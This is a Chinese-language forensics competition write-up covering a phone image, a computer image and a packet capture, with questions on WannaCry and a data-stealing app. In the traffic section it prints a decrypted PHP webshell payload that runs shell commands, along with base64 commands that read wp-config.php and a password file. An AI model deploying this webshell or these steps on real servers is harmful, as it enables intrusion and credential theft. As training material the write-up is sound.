当前位置：首页 > news >正文

24龙信比赛复现

news 文章来源：https://blog.csdn.net/2301_81841047/article/details/142767792 2025/5/24 2:37:18

案情简介：

近期，某公安机关接到受害人报案：通过微信添加认识一位相亲中介客服，客服邀约其与“相亲”对象进行选妃，受害人上钩后，整个过程被涉案团伙录音录像，同时，该客服以有更多的对象可供挑选为由，引导受害人下载其事先制作好的木马APP，受害人安装该APP后，嫌疑人利用录制的视频和受害人的通讯录做要挟，从而实施多次诈骗。最终受害人不堪重负，选择报案。

警方赶到现场后，发现涉案团伙参与另一起侵公案件，故迅速对现场设备进行证据固定制作镜像，并制作以下检材清单，请对检材分析：

序号	检材信息	检材大小	检材哈希(MD5)
1	受害人手机检材.dd	24,226,000,896 字节	f0fcbf82c134b5c47aac5355b74a83d8
2	涉案计算机检材.E01	12,510,412,800 字节	43d8b3820cd5103b42773b80140939aa
3	涉案服务器检材.E01	8,471,552,000 字节	6f970587231acbae7333b28168adc3b3
4	数据流量包.pcapng	17,334,272 字节	7847c2ee62660ea0696d99125d997628

wp部分：

一.手机

1.分析手机检材，请问此手机共通过adb连接过几个设备？ [标准格式：3]

这里的思路呢，要查看通过 ADB（Android Debug Bridge）连接过的设备，可以使用以下几种方法：

方法一：使用 adb devices 命令

方法二：查看 ADB 连接历史

虽然 ADB 本身不提供直接查看历史连接的命令，查看 adb 日志文件 。但是这里通过查找，没有很明显的日志文件信息，通过在文件里面搜索，找到了adb.key文件

补充：

adbkey 是 Android Debug Bridge (ADB) 的密钥文件，用于建立安全的 ADB 连接。ADB 是一个命令行工具，允许开发者与 Android 设备进行通信，以进行应用开发和调试。以下是 adbkey 的一些关键信息：

1. 功能和用途：

身份验证 ： adbkey 文件用于身份验证，确保只有经过授权的计算机可以通过 ADB 连接到 Android 设备。
安全连接 ：使用 SSH（Secure Shell）协议的类似方法，它通过公钥和私钥的机制来加密数据传输。

2. 文件组成：

adbkey ：这是私钥文件，通常存储在用户的 ADB 目录下（例如 ~/.android/adbkey）。
adbkey.pub ：这是对应的公钥文件，通常存储在同一目录下（例如 ~/.android/adbkey.pub）。公钥可以安全地分享给其他人，而私钥应该保持秘密。

3. 生成和配置：

当你首次使用 ADB 并连接到 Android 设备时，ADB 会自动生成 adbkey 和 adbkey.pub 文件。用户需要在设备上确认连接请求，以便将公钥添加到设备的信任列表中。
可以通过运行 adb devices 命令来查看已连接的设备并管理 ADB 连接。

4. 存储位置：

在不同操作系统中， adbkey 和 adbkey.pub 通常存储在以下位置：

窗户： C:\Users\<用户名>\.android\
Linux ： ~/.android/
苹果系统 ： ~/.android/

5. 注意事项：

安全性 ：应确保 adbkey 文件的安全，避免被未授权的用户获取。如果私钥泄露，可能会导致安全风险。
删除或重置 ：如果需要重置 ADB 密钥，可以手动删除这些文件，ADB 会在下次连接时重新生成它们。

通过xml文件，可以找到连接数量

2.分析手机检材，机主参加考试的时间是什么时候？ [标准格式：2024-06-17]

2024-8-23

便签顺推

3.分析手机检材，请问手机的蓝牙Mac地址是多少？ [标准格式：12:12:12:12:12:12]

48:87:59:76:21:0f

4.分析手机检材，请问压缩包加密软件共加密过几份文件？ [标准格式：3]

根据浏览器搜索记录，可知加密软件为filecompress

文件分析中可找到

5.分析手机检材，请问机主的另外一个155的手机号码是多少？ [标准格式：15555000555]

15599555555

一开始以为是在wifi连接记录里面找到的那个155开头的手机号，后面才发现不是，真正的手机号在那个压缩软件，压缩的文件里面

导出后发现有密码加密

在火眼里面找到这个软件，导出，雷电分析

jadx反编译找密码

改后缀，解密，号码在mm.txt

6.分析手机检材，其手机存在一个加密容器，请问其容器密码是多少。 [标准格式：abc123]

d7Avsd!Y]u}J8i(1bnDD@<-o

7.分析手机检材，接上问，其容器中存在一份成员名单，嫌疑人曾经误触导致表格中的一个成员姓名被错误修改，请确认这个成员的原始正确姓名？ [标准格式：张三]

8.分析手机检材，接上题，请确认该成员的对应的最高代理人是谁（不考虑总部）？ [标准格式：张三]
9.分析手机检材，请确认在该组织中，最高层级的层次是多少？（从总部开始算第一级） [标准格式：10]
10.分析手机检材，请问第二层级（从总部开始算第一级）人员最多的人是多少人？ [标准格式：100]
11.分析手机检材，机主共开启了几款APP应用分身？ [标准格式：3]
12.分析手机检材，请问机主现在安装了几款即时通讯软件（微博除外）？ [标准格式：1]
13.分析手机检材，请问勒索机主的账号是多少（非微信ID）？ [标准格式：AB123CD45]
14.分析手机检材，接上问，请问机主通过此应用共删除了多少条聊天记录？ [标准格式：2]
15.分析手机检材，请问会盗取手机信息的APP应用包名是什么？ [标准格式：com.lx.tt]
16.接上题，请问该软件作者预留的座机号码是多少？ [标准格式：40088855555]
17.接上题，恶意程序偷取数据的收件邮箱地址的gmail邮箱是多少？ [标准格式：lx@gmail.com]
18.接上题，恶意程序偷取数据的发件邮箱地址是多少？ [标准格式：lx@gmail.com]
19.接上题，恶意程序偷取数据的发件邮箱密码是多少？ [标准格式：abc123]
20.接上题，恶意程序定义收发件的地址函数是什么？ [标准格式：a]

二.计算机

21.分析计算机检材，嫌疑人在将其侵公数据出售前在Pycharm中进行了AES加密，用于加密的key是多少？ [标准格式：1A23456ABCD]
22.分析计算机检材，身份证为"371963195112051505"这个人的手机号码是多少？ [标准格式：13013524420]
23.分析计算机检材，对解密后的身份证数据列进行单列去重操作，重复的身份证号码数量是多少？(身份证不甄别真假) [标准格式：100]
24.分析计算机检材，接上题，根据身份证号码（第17位）分析性别，男性的数据是多少条？ [标准格式：100]
25.分析计算机检材，接上题，对解密后的数据文件进行分析，甄别身份证号码性别值与标识性别不一致的数量是多少？ [标准格式：100]
26.分析计算机检材，计算机中存在的“VPN”工具版本是多少？ [标准格式：1.1]
27.分析计算机检材，计算机中存在的“VPN”节点订阅地址是什么？ [标准格式：http://xxx.xx/x/xxx]
28.分析计算机检材，eduwcry压缩包文件的解压密码是什么？ [标准格式：abcabc]
29.分析计算机检材，接上题，请问恶意程序释放压缩包的md5值是多少。 [标准格式：全小写]
30.分析计算机检材，接上题，请问恶意程序记录的洋葱浏览器下载地址是多少？ [标准格式：http://xxx.xxx/xxx/xxx.zip]
31.分析计算机检材，接上题，请问恶意程序解密了t.wnry后该dll的md5值是多少。 [标准格式：全小写]
32.分析计算机检材，接上题，恶意程序运行起来后第一个循环调用了几次taskkill.exe。 [标准格式：2]
33.分析计算机检材，接上题，请问@WanaDecryptor@.exe.lnk文件是通过什么函数创建的。 [标准格式：Aabcdef]
34.分析计算机检材，接上题，恶意程序修改系统桌面壁纸是在哪个函数实现的 [标准格式：sub_xxx]
35.分析计算机检材，VeraCrypt加密容器的密码是什么？ [标准格式：abc]
36.分析计算机检材，其中存在一个苹果手机备份包，手机备份包的密码是什么？ [标准格式：12345]
37.分析计算机检材，接上题，机主实际篡改多少条微信数据？ [标准格式：1]
38.分析计算机检材，接上题，机主共存款了多少金额？ [标准格式：10万]
39.分析计算机检材，在手机模拟器中勒索apk软件的sha256值是什么？ [标准格式：全小写]
40.分析计算机检材，接上题，请问勒索apk软件的解锁密码是什么？ [标准格式：qwer.com]

三.流量分析

41.分析流量包检材，给出管理员对web环境进行管理的工具名。 [标准格式：小皮]

答案：宝塔.

这里我一开始也没有什么找的思路，因为这个在材料里面没有什么明确的标记，当时是筛选了很多流量，后面我找了302重定向以后的一些流量信息，在X-Redirect-By: WordPress，这个字段表明这是由WordPress触发的重定向。我就觉得环境管理的工具是wordpress，但是实际上，这个页面的wordpress只是触发了重定向。后面找出来的有关键信息。

42.分析流量包检材，给出攻击者的ip地址是多少。 [标准格式：127.0.0.1]

192.168.209.135

这个从一开始的流量以及会话，到后面用sqlmap的攻击流量都可以看出来攻击者的ip为

192.168.209.135，147那个是服务器的ip

43.分析流量包检材，给出攻击者爆破出的网站非管理员用户名是。 [标准格式：admin]

saber

这里的思路还是，先去把关于爆破的流量先筛选出来，根据筛选的http流量可知，开始爆破的包是12094，结束是17733，筛选含有wp-login的流量包

观察发现，未注册成功的包的长度在1333,根据这个细节，筛选长度发现，只有两个用户的回显是，密码不正确一个是luna，一个是saber。

http and frame.number>=12094 and frame.number<=17733 and http.response.code==200 and !(frame.len>=1330 and frame.len<=1339)

筛选关于他们两个的流量，发现luna的后续包含流量就只有一条且无关，但是saber有登录成功的cookie显示，以及后台信息，可以确定答案为saber

44.分析流量包检材，攻击者进行目录扫描得到的具有后门的页面url路径为。 [标准格式：/abc.html]

upload.html

http.request.uri matches “/*.html”.

组成部分

http.request.uri ：
- 这是指 统一资源标识符 (URI) HTTP 请求的。 URI 通常由服务器上请求的资源的路径组成。例如，如果用户访问 http://example.com/page.html，这 http.request.uri 会是 /page.html.
匹配：
- 这是一个关键字，用于指定左侧（在本例中， http.request.uri) 应根据模式进行检查。如果 URI 与指定模式匹配，则条件评估为 true。
“/*.html” ：
- 这是使用通配符（星号 *) 匹配之前的任何字符序列 .html 文件扩展名。
- 这 * 可以匹配零个或多个字符。所以， /*.html 匹配任何以以下结尾的 URI .html，无论其前面是什么。

或者，这里可以选择从追踪的流量里面，来查看，是否可以成功上传文件等等

45.分析流量包检材，攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。 [标准格式：test-type]

Content-Type：

追踪这个传马的页面，查看流量包

46.分析流量包检材，攻击者上传成功的恶意文件, 该文件的临时存放路径是。 [标准格式：/abc/edf]

/tmp/php38mbeJ

这题确实是我一开始有点先入为主了，因为平时文件上传的图片马偏多，所以当时做的时候，就看见木马内容就没有去管后面的路径提示，所以这里的丢分就很冤。

正确思路如下：

追踪流，有关这个上传页面的

发现，实际上上传了两个文件一个是cont.jpg,一个是cont.php

找到以后，进行对比，其实就已经比较明显了

重点是最后一段：

Upload: cont.php Type: image/jpeg Size: 0.548828125 Kb Temp file: /tmp/php38mbeJ Stored in: uploaded_img/cont.php

Upload: cont.jpg Type: image/jpeg Size: 0.5478515625 Kb Temp file: /tmp/php7Ndiwg cont.jpg already exists.

第一条记录：`cont.php`

文件名: cont.php
文件类型: image/jpeg
文件大小: 约 0.55 Kb
临时文件: 存储在 /tmp/php38mbeJ
存储位置: uploaded_img/cont.php

作用与特征:

PHP 文件: cont.php 是一个 PHP 文件，这意味着它可以包含可执行的服务器端代码。上传 PHP 文件可能会引发安全隐患，因为攻击者可以利用它执行恶意代码。
存储位置: 上传成功后，文件存储在 uploaded_img/cont.php 中，这表明该文件被接受并成功存储。

第二条记录：`cont.jpg`

文件名: cont.jpg
文件类型: image/jpeg
文件大小: 约 0.55 Kb
临时文件: 存储在 /tmp/php7Ndiwg
存在性提示: cont.jpg already exists.

作用与特征:

JPEG 文件: cont.jpg 是一个常见的图像文件格式，不包含可执行代码，因此相对较安全。
存在性提示: 提示“cont.jpg already exists”表明上传的文件名与服务器上已有的文件重复。这可能会导致上传失败，或者系统可能会要求用户重命名文件或覆盖现有文件。

3. 总结

存储与处理: cont.php 被成功存储，意味着上传机制能够处理 PHP 文件；而 cont.jpg 因文件已存在而未能成功存储，可能需要额外的用户操作。
文件管理: 系统在管理文件时，需要妥善处理文件名冲突，并对上传的文件进行类型和内容的有效验证，以确保安全性和数据的完整性。

47.分析流量包检材，服务器php配置文件的存放位置。 [标准格式：/www/sev/php.ini]

/www/server/php/82/etc/php.ini

由木马内容可知AES128加密

追踪木马文件流

尝试以后，进行解密

$cmd="Y2QgL3d3dy93d3dyb290LzE5Mi4xNjguMjA5LjE0Ny91cGxvYWRlZF9pbWcvIDtjYXQgL3RtcC90bXBwYXNz";$cmd=base64_decode($cmd);$path="L3d3dy93d3dyb290LzE5Mi4xNjguMjA5LjE0Ny91cGxvYWRlZF9pbWcv";$path=base64_decode($path);

解密内容可知，第一题的宝塔面板特征，还有倒数第二题的答案

在127流中，可以找到本题答案

Webshell 流量在线解密 V1.0▾常见检测——完美兼容常见PHP检测到：AES(e45e329feb5d925b),Base64,Chrassert|eval(@error_reporting(0);function getSafeStr($str){$s1 = iconv('utf-8','gbk//IGNORE',$str);$s0 = iconv('gbk','utf-8//IGNORE',$s1);if($s0 == $str){return $s0;}else{return iconv('gbk','utf-8//IGNORE',$str);}}function main($cmd,$path){@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time', 0);$result = array();$PadtJn = @ini_get('disable_functions');if (! empty($PadtJn)) {$PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);$PadtJn = explode(',', $PadtJn);$PadtJn = array_map('trim', $PadtJn);} else {$PadtJn = array();}$c = $cmd;if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {$c = $c . " 2>&1\n";}$JueQDBH = 'is_callable';$Bvce = 'in_array';if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {ob_start();system($c);$kWJW = ob_get_contents();ob_end_clean();} else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {$handle = proc_open($c, array(array('pipe','r'),array('pipe','w'),array('pipe','w')), $pipes);$kWJW = NULL;while (! feof($pipes[1])) {$kWJW .= fread($pipes[1], 1024);}@proc_close($handle);} else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {ob_start();passthru($c);$kWJW = ob_get_contents();ob_end_clean();} else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {$kWJW = shell_exec($c);} else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {$kWJW = array();exec($c, $kWJW);$kWJW = join(
, $kWJW) . 
;} else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {$fp = popen($c, 'r');$kWJW = NULL;if (is_resource($fp)) {while (! feof($fp)) {$kWJW .= fread($fp, 1024);}}@pclose($fp);} else {$kWJW = 0;$result["status"] = base64_encode("fail");$result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");$key = $_SESSION['k'];echo encrypt(json_encode($result));return;}$result["status"] = base64_encode("success");$result["msg"] = base64_encode(getSafeStr($kWJW));echo encrypt(json_encode($result));}function Encrypt($data)
{@session_start();$key = $_SESSION['k'];if(!extension_loaded('openssl')){for($i=0;$i<strlen($data);$i++) {$data[$i] = $data[$i]^$key[$i+1&15];}return $data;}else{return openssl_encrypt($data, "AES128", $key);}
}
$cmd="Y2QgL3d3dy93d3dyb290LzE5Mi4xNjguMjA5LjE0NyA7Y2F0IHdwLWNvbmZpZy5waHA=";$cmd=base64_decode($cmd);$path="L3d3dy93d3dyb290LzE5Mi4xNjguMjA5LjE0Nw==";$path=base64_decode($path);main($cmd,$path););

解密得到

解密回显内容

gpt跑一下

可以得到48的答案

通过分析流量可知，配置存储文件在流127之前，通过筛选找到这个

通过解码判断回显内容应该为phpinfo，接着按上面那样解码内容，base64解密，将文件内容导出，改格式为html

得到位置

/www/server/php/82/etc/php.ini

48.分析流量包检材，被攻击的web环境其数据库密码是。 [标准格式：qwer1234]

X847Z3QzF1a6MHjR

在上一题的回显流量中就是那个命令，cat wp-config.php,解密回显内容可得

49.分析流量包检材，服务器管理存放临时登录密码的位置。 [标准格式：/tmp/pass]

/tmp/tmppass

由上可知

/www/wwwroot/192.168.209.147/uploaded_img/ ;cat /tmp/tmppass

50.分析流量包检材，黑客获取的高权限主机的登录密码。 [标准格式：qwer1234]

passwd!@#

和上面一样，找到临时路路径以后，看回显，解码可得